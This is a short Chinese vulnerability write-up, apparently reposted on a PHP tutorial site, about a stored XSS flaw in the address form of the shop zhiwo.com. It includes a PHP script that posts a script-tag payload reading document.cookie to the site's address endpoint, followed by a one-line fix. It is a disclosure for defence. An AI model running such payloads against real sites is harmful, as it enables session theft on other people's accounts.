网站地图    收藏   

主页 > 后端 > 网站安全 >

知我药妆一个存储型XSS漏洞 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 网站过滤不严个人地址仅仅在js做了过滤,直接csrf构造post包$url=#39;http://www.zhiwo.com/account/ajax/add/address#39;;$ref=#39;http://www.zhiwo.com/account/addresses#39;;$cookies=#39;xxxxxxxxxxx......

网站过滤不严
个人地址仅仅在js做了过滤,直接csrf构造post包
 
$url='http://www.zhiwo.com/account/ajax/add/address';
$ref='http://www.zhiwo.com/account/addresses';
$cookies='xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx';//copy你的cookies
$postfield=array(
    'recipient_name'=>'test',
    'recipient_province'=>'北京市',
    'recipient_city'=>'市辖区',
    'recipient_dist'=>'朝阳区',
    'recipient_street'=>'<script>alert(document.cookie);</script>',
    'recipient_zip'=>'100010',
    'recipient_mobile'=>'13212312345'
);
$postfield = http_build_query($postfield);
$result = curlrequest($url, $postfield,$ref,$cookies);

 
 
修复方案:

后台增加过滤即可

作者 taylortai

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论